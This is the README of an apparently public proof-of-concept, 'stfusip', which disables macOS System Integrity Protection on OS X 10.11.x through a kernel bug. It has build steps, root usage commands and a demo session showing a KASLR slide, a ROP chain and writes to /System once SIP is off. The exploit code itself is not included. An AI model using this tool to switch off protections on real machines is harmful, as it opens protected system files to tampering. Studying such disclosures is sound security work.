/stfusip

System Integrity Protection (SIP) bypass for OSX 10.11.1 - 10.11.2 - 10.11.3

Primary LanguageC

stfusip

credits & thanks

  • jndok – a.k.a. myself, for code and exploit.
  • qwertyoruiop – for bug and related help! go follow him on Twitter :)

compile

Simply do make, inside stfusip folder. If you encounter linking problems, be sure to check that you have capstone installed on your system. There is a flag inside Makefile to specify capstone's include directory, be sure to edit it if capstone is located elsewhere on your system!

If you don't have capstone installed, do:

brew install capstone

and you should be set.

usage

So, stfusip is a simple poc for disabling/enabling SIP, a.k.a. System Integrity Protection, a.k.a. rootless on OSX 10.11.1. Bug could theoretically still work on 10.11.2, but I am really not sure.

Super easy to use, needs to be run as root!:

sudo ./stfusip disable /* this disables SIP */
sudo ./stfusip enable  /* this enables SIP */

Here's a demo output:

jndoks-Mac-Pro:stfusip jndok$ sudo su
sh-3.2# whoami
root
sh-3.2# touch /System/yolo
touch: /System/yolo: Operation not permitted
sh-3.2# ./stfusip disable
[+] kaslr slide is: 0x0000000c600000
[+] built ROP chain @ 0xbff56c90 (mapped @ 0x261)!
[+] trigger set: 0x18 : 0xffffff800c8c41bf

[-] System Integrity Protection (SIP) has been disabled.
sh-3.2# touch /System/yolo
sh-3.2# ls -ls /System/
total 0
0 drwxr-xr-x  74 root  wheel  2516 Dec  7 09:43 Library
0 -rw-r--r--   1 root  wheel     0 Dec  7 15:46 yolo
sh-3.2# rm -rf /System/yolo
sh-3.2# ls -ls /System/
total 0
0 drwxr-xr-x  74 root  wheel  2516 Dec  7 09:43 Library
sh-3.2# ./stfusip enable
[+] kaslr slide is: 0x0000000c600000
[+] built ROP chain @ 0xbfff6c90 (mapped @ 0x261)!
[+] trigger set: 0x18 : 0xffffff800c8c41bf

touch: /System/test: Operation not permitted
[+] System Integrity Protection (SIP) has been enabled.
sh-3.2# touch /System/yolo
touch: /System/yolo: Operation not permitted
sh-3.2# exit